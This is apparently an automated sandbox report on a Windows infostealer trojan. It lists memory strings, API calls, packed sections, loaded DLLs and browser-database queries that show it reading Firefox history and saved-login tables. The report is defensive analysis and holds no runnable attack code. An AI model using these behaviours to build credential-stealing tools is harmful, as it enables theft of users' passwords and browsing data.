Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666695597.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1589811279.000000002F9A0000.00000004.00000020.00020000.00000000.sdmp, CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CBFB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB8C0 rand_s,NtQueryVirtualMemory,	0_2_6CBFB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CBFB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CB9F280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF	0_2_00ACF0EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0	0_2_00B2D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B28921	0_2_00B28921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB6909	0_2_00AB6909
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B312CE	0_2_00B312CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2527B	0_2_00B2527B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2727D	0_2_00A2727D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4E3FA	0_2_00A4E3FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2F3CB	0_2_00B2F3CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B39337	0_2_00B39337
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B344FE	0_2_00B344FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4742E	0_2_00C4742E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B26DBB	0_2_00B26DBB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B35D31	0_2_00B35D31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2BEA5	0_2_00B2BEA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8BEC1	0_2_00A8BEC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B37E15	0_2_00B37E15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB935A0	0_2_6CB935A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF34A0	0_2_6CBF34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFC4A0	0_2_6CBFC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA6C80	0_2_6CBA6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD6CF0	0_2_6CBD6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9D4E0	0_2_6CB9D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD4D0	0_2_6CBBD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA64C0	0_2_6CBA64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0545C	0_2_6CC0545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD5C10	0_2_6CBD5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE2C10	0_2_6CBE2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0AC00	0_2_6CC0AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0542B	0_2_6CC0542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA5440	0_2_6CBA5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF85F0	0_2_6CBF85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD0DD0	0_2_6CBD0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBED10	0_2_6CBBED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC0512	0_2_6CBC0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAFD00	0_2_6CBAFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF4EA0	0_2_6CBF4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC076E3	0_2_6CC076E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB5E90	0_2_6CBB5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFE680	0_2_6CBFE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9BEF0	0_2_6CB9BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAFEF0	0_2_6CBAFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF9E30	0_2_6CBF9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC06E63	0_2_6CC06E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD7E10	0_2_6CBD7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE5600	0_2_6CBE5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9C670	0_2_6CB9C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9E50	0_2_6CBB9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD3E50	0_2_6CBD3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE2E4E	0_2_6CBE2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB4640	0_2_6CBB4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE77A0	0_2_6CBE77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC6FF0	0_2_6CBC6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9DFE0	0_2_6CB9DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD7710	0_2_6CBD7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA9F00	0_2_6CBA9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC050C7	0_2_6CC050C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC60A0	0_2_6CBC60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBC0E0	0_2_6CBBC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD58E0	0_2_6CBD58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDB820	0_2_6CBDB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE4820	0_2_6CBE4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA7810	0_2_6CBA7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDF070	0_2_6CBDF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB8850	0_2_6CBB8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD850	0_2_6CBBD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCD9B0	0_2_6CBCD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9C9A0	0_2_6CB9C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD5190	0_2_6CBD5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF2990	0_2_6CBF2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0B170	0_2_6CC0B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEB970	0_2_6CBEB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAD960	0_2_6CBAD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA940	0_2_6CBBA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBACAB0	0_2_6CBACAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB922A0	0_2_6CB922A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC4AA0	0_2_6CBC4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB1AF0	0_2_6CBB1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDE2F0	0_2_6CBDE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0BA90	0_2_6CC0BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC02AB0	0_2_6CC02AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD8AC0	0_2_6CBD8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD9A60	0_2_6CBD9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC053C8	0_2_6CC053C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9F380	0_2_6CB9F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDD320	0_2_6CBDD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAC370	0_2_6CBAC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB95340	0_2_6CB95340

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 007645C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBD94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBCCBE8 appears 134 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.1667191321.000000006CE15000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: exbnbhbd ZLIB complexity 0.9948048289453832

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBF7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CBF7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00779600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00773720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00773720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\J6VYLJQS.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT url FROM moz_places LIMIT 1000f;q
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1510103828.000000001D780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1496044503.000000001D764000.00000004.00000020.00020000.00000000.sdmp, AKKKFBGDHJKFHJJJJDGC.0.dr, AFCBFIJEHDHCBGDGDGCB.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
